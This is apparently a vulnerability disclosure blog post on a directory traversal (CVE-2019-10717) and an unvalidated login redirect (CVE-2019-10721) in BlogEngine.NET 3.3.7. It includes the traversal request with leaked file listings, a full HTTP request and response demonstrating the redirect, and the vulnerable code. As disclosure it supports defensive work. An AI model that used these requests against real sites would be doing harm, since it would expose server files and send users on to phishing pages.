BLOG HOME > Directory Traversal & Listing; Login Page Unvalidated Redirect Directory Traversal & Listing; Login Page Unvalidated Redirect

Author: Aaron Bishop


A directory traversal, CVE-2019-10717, was identified on BlogEngine.NET applications versions 3.3.7 and earlier through the /api/filemanager endpoint. This issue reveals the contents of directories in the web root. Authentication is required to exploit this issue.

Vendor Patch


  • Identified: 30 Mar 2019
  • Initial Developer Contact: 31 Mar 2019
  • Issue Disclosed: 24 Jun 2019


File Manager is used by the application to show the contents of ~/App_Data/files and sub-directories in the UI. Submitting requests directly to /api/filemanager with a modified path parameter reveals directory contents beyond ~/App_Data/files.

A request to /api/filemanager?path=%2F..%2f..%2f shows the contents of the web root:


    "IsChecked": false,
    "SortOrder": 25,
    "Created": "5/26/2018 1:53:02 PM",
    "Name": "Web.config",
    "FileSize": "19.41 kb",
    "FileType": 1,
    "FullPath": "/../../Web.config",
    "ImgPlaceholder": "fa fa-file-o"

The content of additional directories will be revealed by tampering with the path parameter:


    "IsChecked": false,
    "SortOrder": 15,
    "Created": "3/30/2019 9:09:23 PM",
    "Name": "toastr.scss",
    "FileSize": "6.92 kb",
    "FileType": 1,
    "FullPath": "/../../Content/toastr.scss",
    "ImgPlaceholder": "fa fa-file-o"

This issue could be exploited to verify uploaded files needed for a RCE attack or to identify files to retrieve through an XXE.


Generates a list of all files in the web root:

python -t $HOST


A unvalidated redirect, CVE-2019-10721, exists on BlogEngine.NET versions 3.3.7 and earlier on login.aspx. This attack would send users that attempt to log in to the application to an external, potentially malicious, site.

Vendor Patch


  • Identified: 30 Mar 2019
  • Initial Developer Contact: 31 Mar 2019
  • Issue Disclosed: 24 Jun 2019


The ReturnURL parameter can be set to an external URL. If a user clicks a link with a malicious ReturnURL, such as http://$RHOST/Account/login.aspx?ReturnURL=//, the user will be redirected to the malicious site after successfully logging in to the application. The following request demonstrates the behavior:

POST /Account/login.aspx? HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://$RHOST/Account/login.aspx?ReturnURL=//
Cookie: COOKIES 
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 576


HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: COOKIE
X-Powered-By: ASP.NET
Date: Thu, 04 Apr 2019 17:33:07 GMT
Connection: close
Content-Length: 137

<html><head><title>Object moved</title></head><body>
<h3>Object moved to <a href="">here</a>.</h3>

This behavior can be traced to:


187                     // ignore Return URLs not beginning with a forward slash, such as remote sites.
188                     if (string.IsNullOrWhiteSpace(returnUrl) || !returnUrl.StartsWith("/"))
189                         returnUrl = null;
191                     if (!string.IsNullOrWhiteSpace(returnUrl))
192                     {
193 context.Response.Redirect(returnUrl)
194                     }
195                     else
196                     {
197                         context.Response.Redirect(Utils.RelativeWebRoot);
198                     }

The application accepts a ReturnUrl that begins with /. // is commonly used to specify external URLs using the same protocol as the current page. // satisfies the requirement that the ReturnURL start with /.

We are excited to work with you.


Thank you!

Your request has been submitted.